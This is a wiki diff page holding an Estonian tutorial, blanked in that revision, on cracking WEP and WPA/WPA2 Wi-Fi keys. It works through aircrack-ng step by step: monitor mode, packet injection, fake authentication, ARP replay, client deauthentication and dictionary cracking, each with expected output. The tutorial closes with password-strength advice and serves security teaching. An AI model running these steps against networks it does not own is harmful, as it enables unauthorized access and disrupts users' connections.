Help:Contents: Difference between revisions

From ICO wiki
Jump to navigationJump to search
(Created page with '== WPA/WPA2 == Järgmise põlvkonna meetod krüpteerimaks traadita võrke (''WiFi'') on '''WPA''' ehk ''Wi-Fi Protected Access''. Teadagi, pole ükski süsteem perfektne. Kõig…')
 
(Blanked the page)
 
Line 1: Line 1:
== WPA/WPA2 ==


Järgmise põlvkonna meetod krüpteerimaks traadita võrke (''WiFi'') on '''WPA''' ehk ''Wi-Fi Protected Access''. Teadagi, pole ükski süsteem perfektne. Kõige lihtsam viis kasutamaks WPA krüpteeringut tundub olevat tema suurim viga ning selleks on ''Pre-Shared Key'' (PSK). WPA-PSK lubab administraatoril kindlaks määrata salasõna, mis peab olema teada igale ''Access Point'' kasutajale. ''Access Point'' on seade, mis lubab traadita võrke kasutavaid vahendeid ühendada  võrku kasutades selleks kas WiFi’t, Bluetoothi vms. WPA-PSK kasutades ollakse avatud rünnakutele (''offline dictionary attack''), kus ründaja loeb pakette ajal, mil keegi ühendab ennast võrku ning kasutades neid pakette on võimalik taastada ''Pre-Shared Key'' ehk salasõna. Seda juhul, kui määratud salasõna ei ole liiga pikk. Tüüpiline viga, mida inimesed teevad, kui nad omale salasõna valivad on see, et nad kasutavad lihtsaid sõnu, fraase, mis on lühikesed ja ei sisalda numbreid või sümboleid. Taolised salasõnad on ''dictionary attack'' tehnikale maiuspalaks. On olemas palju erinevaid vahendeid ja tööriistu sellise protsessi läbiviimiseks. Üks tõhusamaid minu enda kogemuse põhjal on '''Aircrack'''. See on kogumik erinevatest tööriistadest:
• '''Airodump''': programm pakettide püüdmiseks
• '''Aireplay''': programm pakettide „süstimiseks“
• '''Aircrack''': staatiline WEP ja WPA-PSK võtme kräkkija
• '''Airdecap''': WEP/WPA püütud failide dekrüptimiseks
Krüpteeritud võrgu häkkimise aeg sõltub liiklusest võrgus (''traffic''). Mida vähem liiklust, seda rohkem läheb aega andmete kogumiseks ning vastupidi. Sellepärast kasutataksegi Aireplay tööriista.  See on vahend liikluse tekitamiseks või genereerimiseks. Aireplay võimaldab suurendada liiklust, mistõttu kiireneb ka kogu kräkkimise protsess.
Üks tähtis eripära WPA/WPA2 ja WEP kräkkimise vahel on lähenemisviis kräkkimaks WPA/WPA2 Pre-Shared võtit (''Pre-Shared Key''). Kui WEP kräkkimisel saab kiirendada protsessi staatiliste meetoditega, siis WPA/WPA2 puhul on ainsaks abiks ''plain brute force'' tehnikad ehk nö. toore-jõu tehnikad. See on sellepärast, et võti ei ole staatiline – protsessi kiirendamine ei ole võimalik nii nagu WEP kräkkimisel. Ainus viis info saamiseks on ühendus kliendi ja ''Access Point'' vahel (''handshake''). ''Handshake'' toimub, kui klient ühendab võrguga. Kuna salasõna võib olla 8 kuni 63 tähemärki, siis muutub WPA/WPA2 kräkkimine võimatuks, kui salasõna koosneb 63 suvaliselt genereeritud tähemärgist ja sümbolist. Ehk kui salasõna on võimalikult lühike ja ei sisaldada palju numbreid on veel võimalik nimetatud protsess läbi viia. Arvuti suudab testida 50 kuni 300 võimalikku võtit sekundis olenevalt arvutist. Pikkade salasõnade kräkkimine võib aega võtta tunde, päevi isegi aastaid. Lähemalt võib arvutada siit: [http://lastbit.com/pswcalc.asp]
== WEP ==
'''WEP''' (''wired equivalent privacy'') on krüpteerimismeetod traadita võrkude kaitseks. Tegemist on väga vana ning algelise kaitsega, mistõttu on seda lihtne lahti kräkkida. WEP’il on kolm seadistust: off ehk kaitse maas, 64-bit ehk nõrk kaitse ning 128-bit ehk natukene tugevam kaitse. Kui WEP on off staadiumis, siis võib iga suvaline inimene ennast võrku ühendada. Kasutades kas 64-bit või 128-bit kaitset on teoreetiliselt võrk siiski kaitstud, kuid reaalselt ei ole vahet, kas kasutatakse 64-bit või 128-bit kaitset, sest mõlemad võtmed on ühtemoodi kräkitavad. WEP’i kräkkimisprotsess baseerub '''IV'''’del ehk ''Initalization Vector''itel. Kogudes piisavalt palju IV’si on WEP kräkkimine vaid aja küsimus.
== Näide WEP kräkkimise protsessist ==
'''Eeldused:'''
• Õiged driverid, et viia läbi „süstimine“ (''injection'')
• Ollakse füüsiliselt piisavalt lähedale Access Pointile
• Kasutatakse v0.9.1 või suuremat versiooni aircrack-ng’st
• Kasutatakse Linuxit aircrack jaoks
• Võrgus on vähemalt 1 aktiivne klient
'''Alustamine:'''
Soovitav on üles märkida järgmised andmed:
• Arvuti MAC aadress, mis jooksutab aircrack-ng'd (''näide: 00:0F:B5:88:AC:82'')
• BSSID (Access Point MAC aadress (''näide: 00:14:6C:7E:40:80'')
• ESSID (''võrgu nimi'') (''näide: metsaloomad'')
• Access Point’i kanal (''näide: 9'')
• Wireless interface (''näide: ath0'')
'''Lahendus:'''
Eesmärgiks on püüda kinni võimalikult palju IV’si. Tavaliselt ei genereerita neid IV’si just väga kiiresti normaalse võrguliikluse (''network traffic'') puhul. Kuna me oleme kannatamatud, siis kasutatakse siinkohal „süstimise“ (''injection'') tehnikat, et protsessi kiirendada. Selle tehnika puhul saadab Access Point valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda võimalikult palju IV’si võimalikult vähese ajaga.
'''Sammud selleks:'''
• Seadistada ennast kindlale Access Point kanalile (''näiteks siin 9'')
• Testida „süstimise“ suutlikkust Access pointile
• Kasutada aireplay-ng'd vale audentimise läbiviimiseks Access Pointiga
• Panna tööle airodump-ng sellel Access Point kanalil koos BSSID filtriga, kogumaks IV’si
• Kasutada aireplay-ng'd pakettide süstimiseks
• Kasutada aircrack-ng'd kräkkimaks salasõna, kasutades ära kogutud IV’si
Esmalt tuleb avada konsooli aken ning oma wifi kaart panna seisundisse ''monitor mode''. See on seisund, kus kaart kuulab igat paketti. Igat paketti kuulates on võimalik valida välja mõned neist et viia läbi „süstimine“. Kirjutades käsureale '''airmon-ng stop ath0'''  peaks tulema taoline vastus:
Interface      Chipset        Driver
wifi0          Atheros        madwifi-ng
ath0            Atheros        madwifi-ng VAP (parent: wifi0) (VAP destroyed)
Tuleb sulgeda kõik athX. Kui on suletud kõik athX ning kirjutades käsureale '''iwconfig''' peaks tulemus olema:
lo        no wireless extensions.
eth0      no wireless extensions.
wifi0    no wireless extensions.
Seejärel seadistame võrgukaardi 9-ndale kanalile käsuga''' airmon-ng start wifi0 9''' ning sisestame uuesti kontrollimiseks '''iwconfig'''
Tulemus peaks olema taoline:
lo        no wireless extensions.
wifi0    no wireless extensions.
eth0      no wireless extensions.
ath0      IEEE 802.11g  ESSID:""  Nickname:""
        Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82 
        Bit Rate:0 kb/s  Tx-Power:18 dBm  Sensitivity=0/3 
        Retry:off  RTS thr:off  Fragment thr:off
        Encryption key:off
        Power Management:off
        Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm
        Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
        Tx excessive retries:0  Invalid misc:0  Missed beacon:0
Järgnevalt tuleb testida „süstimise“ suutlikkust Access pointile. Selle sammu eesmärgiks on selgitada, kas ollakse piisavalt lähedal Access pointile, et sinna pakette „süstida“. Käsureale tuleb sisestada '''aireplay-ng -9 -e metsaloomad -a 00:14:6C:7E:40:80  ath0'''
Vastus peaks välja nägema:
09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35  Trying broadcast probe requests...
09:23:35  Injection is working!
09:23:37  Found 1 AP
09:23:37  Trying directed probe requests...
09:23:37  00:14:6C:7E:40:80 - channel: 9 - 'metsaloomad'
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39  30/30: '''100%'''
Viimane rida näitab, kas ollakse piisavalt lähedal või mitte ning kas on võimalik viia läbi „süstimine“. Järgnevalt püütakse IV’si, kasutades selleks airodump-ng’d. Selleks kirjutatakse uude konsooli aknasse '''airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0''' Kui „süstimine“ õnnestub on mingi aja vältel tulemuseks:
CH  9 ][ Elapsed: 8 mins ][ 2010-03-21 19:25
                                                                                                             
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                           
00:14:6C:7E:40:80  42 100    5240  178307  338  9  54  WEP  WEP        metsaloomad                         
                                                                                                           
BSSID              STATION            PWR  Lost  Packets  Probes                                           
                                                                                                           
00:14:6C:7E:40:80  00:0F:B5:88:AC:82  42    0  183782 
Kasutades aireplay-ng’d luuakse võlts audentimine Access Pointiga. Selleks trükitakse uude konsooli aknasse järgmine käsurida '''aireplay-ng -1 0 -e metsaloomad -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0'''
(''variatsioon sellest: aireplay-ng -1 6000 -o 1 -q 10 -e metsaloomad -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0'')
Õnnestumise korral on tulemuseks:
18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)
Ebaõnnestumise korral on tulemuseks:
8:28:02  Sending Authentication Request
18:28:02  Authentication successful
18:28:02  Sending Association Request
18:28:02  Association successful :-)
18:28:02  Got a deauthentication packet!
18:28:05  Sending Authentication Request
18:28:05  Authentication successful
18:28:05  Sending Association Request
18:28:10  Sending Authentication Request
18:28:10  Authentication successful
18:28:10  Sending Association Request
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ''ARP requeste'', et neid siis tagasi võrku „süstida“. Selleks kirjutatakse uude konsooli aknasse '''aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0'''
Tulemus peaks välja nägema selline:
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV’de põhjal. Selleks avatakse uus konsooli aken ning sisestatakse '''aircrack-ng -b 00:14:6C:7E:40:80 output*.cap'''
Tulemus on järgmine:
                              [00:03:06] Tested 674449 keys (got 96610 IVs)
KB    depth  byte(vote)
  0    0/  9  12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(  5) 77(  5) A5(  3) F6(  3) 03(  0)
  1    0/  8  34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12)
  2    0/  2  56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10)
  3    1/  5  78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15)
                      KEY FOUND! [ '''12''':'''34''':'''56''':'''78''':'''90''' ]
      Probability: 100%
== Näide WPA kräkkimise protsessist ==
'''Eeldused:'''
• Õiged driverid, et viia läbi „süstimine“ (''injection'')
• Ollakse füüsiliselt piisavalt lähedale Access Pointile
• Kasutatakse v0.9.1 või suuremat versiooni aircrack-ng’st
• Kasutatakse Linuxit aircrack jaoks
'''Alustamine:'''
Soovitav on üles märkida järgmised andmed:
• Arvuti MAC aadress, mis jooksutab aircrack-ng (''näide: 00:0F:B5:88:AC:82'')
• Kliendi MAC aadress, kes kasutab WPA/WPA2 (''näide: 00:0F:B5:FD:FB:C2'')
• BSSID (Access Point MAC aadress (''näide: 00:14:6C:7E:40:80'')
• ESSID (''võrgu nimi'') (''näide: metsaloomad'')
• Access Point’i kanal (''näide: 9'')
• Wireless interface (''näide: ath0'')
'''Lahendus:'''
Eesmärgiks on püüda kinni WPA/WPA2 audentimise ''handshake'' ning seejärel kasutades aircrack-ng'd leida ''Pre-Shared Key'' või salasõna.
'''Sammud selleks:'''
• Seadistada ennast kindlale Access Point kanalile (''näiteks siin 9'')
• Panna tööle airodump-ng sellel Access Point kanalil koos BSSID filtriga, kogumaks audentimise käepigistust (''handshake'')
• Kasutada aireplay-ng kliendi deaudentimiseks
• Kasutada aircrack-ng kräkkimaks salasõna kasutades ära ''handshake''’i
Esmalt tuleb avada konsooli aken ning oma wifi kaart panna seisundisse ''monitor mode''. See on seisund, kus kaart kuulab igat paketti. Igat paketti kuulates on võimalik leida ''handshake''. Kirjutades käsureale '''airmon-ng''' peaks tulema vastuseks:
Interface      Chipset        Driver
rausb0          Ralink RT73    rt73
wlan0          Broadcom        b43 - [phy0]
wifi0          Atheros        madwifi-ng
ath0            Atheros        madwifi-ng VAP (parent: wifi0)
Kõigepealt tuleb sulgeda kõik athX. Siinkohal kirjutame käsureale '''airmon-ng stop ath0''' Kui on suletud kõik athX ning kirjutades käsureale '''iwconfig''' peaks tulemus olema:
lo        no wireless extensions.
eth0      no wireless extensions.
wifi0    no wireless extensions.
Seejärel seadistame võrgukaardi 9-ndale kanalile käsuga '''airmon-ng start wifi0 9''' ning sisestame uuesti kontrollimiseks '''iwconfig'''
Tulemus peaks olema midagi sellist:
lo        no wireless extensions.
wifi0    no wireless extensions.
eth0      no wireless extensions.
ath0      IEEE 802.11g  ESSID:""  Nickname:""
        Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82 
        Bit Rate:0 kb/s  Tx-Power:18 dBm  Sensitivity=0/3 
        Retry:off  RTS thr:off  Fragment thr:off
        Encryption key:off
        Power Management:off
        Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm
        Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
        Tx excessive retries:0  Invalid misc:0  Missed beacon:0
Järgmiseks kasutatakse airodump-ng'd ''handshake'' kogumiseks (''uus konsooli aken''): '''airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0'''
Õnnestunud ''handshake'' korral on tulemus:
  CH  9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
                                                                                                             
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                             
  00:14:6C:7E:40:80  39 100      51      116  14  9  54  WPA2 CCMP  PSK  metsaloomad                         
                                                                                                             
  BSSID              STATION            PWR  Lost  Packets  Probes                                           
                                                                                                             
  00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2  35    0      116 
Ebaõnnestunud ''handshake'' korral on tulemus:
CH  9 ][ Elapsed: 4 s ][ 2007-03-24 17:51
                                                                                                             
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                             
  00:14:6C:7E:40:80  39 100      51        0    0  9  54  WPA2 CCMP  PSK  metsaloomad                         
                                                                                                             
  BSSID              STATION            PWR  Lost  Packets  Probes     
Siit edasi kasutatakse aireplay-ng'd, et deaudentida klient. See osa on valikuline, sest võib jääda ka ootama, kuni airodump-ng püüab kinni ''handshake''’i. Protsessi kiirendamiseks tuleb uude konsooli aknasse kirjutada '''aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0''' , mille tulemus peaks olema:
11:09:28  Sending DeAuth to station  -- STMAC: [00:0F:B5:34:30:30]
Viimaks, kui on püütud kinni ''handshake'' proovitakse salasõna kräkkida. Selleks avatakse uus konsooli aken ning trükitakse '''aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap'''
Kui ''handshake''’i pole püütud on vastuseks:
Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.
No valid WPA handshakes found.
Sellisel juhul tuleb teha uuesti kliendi deaudentimine. Kui ''handshake'' püüti kinni, siis tulemus on selline:
Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.
#  BSSID              ESSID                    Encryption
1  00:14:6C:7E:40:80  metsaloomad              WPA (1 handshake)
Choosing first network as target.
Siinkohal proovib aircrack-ng salasõna lahti kräkkida. See võib võtta tunde või isegi päevi. Õnnestumise korral on vastus selline:
    Aircrack-ng 0.8
                [00:00:00] 2 keys tested (37.20 k/s)
                        KEY FOUND! [ '''12345678''' ]
    Master Key    : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
                    B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
    Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
                    CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
                    FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
                    2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
    EAPOL HMAC    : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
Selleks, et oma võrku piisavalt hästi kaitsta, tuleks kindlasti eelistada WPA’d WEP’ile. Soovitav on kasutada salasõnas kombinatsioone tähtedest, numbritest ja sümbolitest ning valida võtmed, mis on piisavalt pikad, et muuta nende kräkkimine praktiliselt võimatuks.
== Kasutatud kirjandus ==
http://it.toolbox.com/blogs/unwired/wpa-encryption-cracking-7419
http://it.toolbox.com/blogs/unwired/cracking-wpapsk-6730
http://www.aircrack-ng.org/doku.php?id=cracking_wpa
http://connect-connect.blogspot.com/2007/09/wireless-security-insight-into-wep.html
http://www.aircrack-ng.org/doku.php?id=simple_wep_crack

Latest revision as of 18:09, 25 May 2010